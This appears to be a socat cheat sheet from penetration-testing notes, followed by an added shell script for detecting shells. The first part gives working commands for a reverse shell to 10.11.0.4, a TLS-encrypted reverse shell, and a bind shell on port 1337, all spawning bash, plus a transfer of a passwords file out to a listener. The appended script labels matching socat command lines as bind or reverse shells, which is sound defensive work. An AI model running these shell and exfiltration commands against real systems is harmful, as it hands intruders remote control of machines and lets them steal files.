Socat

Reverse Shell

Listen:

sudo socat -d -d TCP4-LISTEN:443 STDOUT

Connect:

socat TCP4:10.11.0.4:443 EXEC:/bin/bash

Send file:

sudo socat TCP4-LISTEN:443,fork file:secret_passwords.txt

socat TCP4:10.11.0.4:443 file:received_secret_passwords.txt,create

Encrypted Rev Shell:

openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 362 -out bind_shell.crt

cat bind_shell.key bind_shell.crt > bind_shell.pem

sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash

Connect:

socat - OPENSSL:10.11.0.4:443,verify=0

Bind Shell

Victim:

socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane

Attacker:

socat FILE:`tty`,raw,echo=0 TCP:<victim_ip>:1337
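
Detection (added example, not part of the original page): the script below labels process command lines that match the socat patterns above by direction. LISTEN plus EXEC is reported as a bind shell, connect plus EXEC as a reverse shell. The function names are hypothetical, and the sample rows are commands from this page plus one constructed benign row.

```shell
#!/bin/sh
# Added example, not from the original page. Function names are hypothetical.
# classify_socat CMDLINE -> bind-shell, reverse-shell, tls-bind-shell,
# tls-reverse-shell, or none. Runs in a subshell so set -f stays local.
classify_socat() (
    set -f   # no glob expansion while word-splitting the command line
    is_socat=0 exec_addr=0 listen=0 connect=0 prefix=""
    for word in $1; do
        # socat address keywords are case-insensitive; normalise first.
        upper=$(printf '%s' "$word" | tr '[:lower:]' '[:upper:]')
        case "$upper" in
            SOCAT|*/SOCAT)     is_socat=1 ;;
            EXEC:*|SYSTEM:*)   exec_addr=1 ;;
            OPENSSL-LISTEN:*)  listen=1; prefix="tls-" ;;
            TCP-LISTEN:*|TCP4-LISTEN:*|TCP6-LISTEN:*) listen=1 ;;
            OPENSSL:*)         connect=1; prefix="tls-" ;;
            TCP:*|TCP4:*|TCP6:*) connect=1 ;;
        esac
    done
    # A label needs socat itself plus a program address (EXEC/SYSTEM).
    if [ "$is_socat$exec_addr" != 11 ]; then echo none
    elif [ "$listen" -eq 1 ]; then echo "${prefix}bind-shell"
    elif [ "$connect" -eq 1 ]; then echo "${prefix}reverse-shell"
    else echo none
    fi
)

# scan_cmdlines: one command line per row on stdin; prints
# "label<TAB>command" for every row that gets a label.
scan_cmdlines() {
    while IFS= read -r line; do
        label=$(classify_socat "$line")
        if [ "$label" != none ]; then printf '%s\t%s\n' "$label" "$line"; fi
    done
}

# Sample rows: commands from this page plus one constructed benign row.
sample_cmdlines() {
    cat <<'EOF'
socat TCP4:10.11.0.4:443 EXEC:/bin/bash
sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash
socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
sudo socat -d -d TCP4-LISTEN:443 STDOUT
/usr/sbin/sshd -D
EOF
}

sample_cmdlines | scan_cmdlines
```

On a live Linux host, `ps -eo args= | scan_cmdlines` feeds it the running process list instead of the sample rows.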
